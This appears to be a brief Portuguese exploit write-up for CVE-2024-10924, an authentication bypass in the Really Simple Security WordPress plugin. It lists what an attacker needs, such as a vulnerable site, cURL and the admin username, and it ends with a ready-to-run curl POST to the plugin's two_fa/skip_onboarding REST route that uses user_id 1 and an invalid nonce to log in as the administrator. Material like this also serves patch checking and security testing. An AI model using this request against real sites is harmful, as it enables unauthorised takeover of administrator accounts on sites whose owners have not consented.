
CVE-2024-10924 é uma vulnerabilidade crítica de bypass de autenticação no plugin Really Simple Security para WordPress (versões 9.0.0 a 9.1.1.1). Esta vulnerabilidade permite que atacantes não autenticados façam login como qualquer usuário (incluindo administrador) explorando uma falha na API de Autenticação de Dois Fatores (2FA).
Um site WordPress executando uma versão vulnerável do plugin Really Simple Security. Python 3.x ou cURL instalado para testes. O nome de usuário admin do WordPress alvo (a enumeração de usuários pode ser necessária).
curl --request POST "http://{url}/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" -H "Content-Type: application/json" -d '{"user_id": 1, "login_nonce": "invalid_nonce"}' -v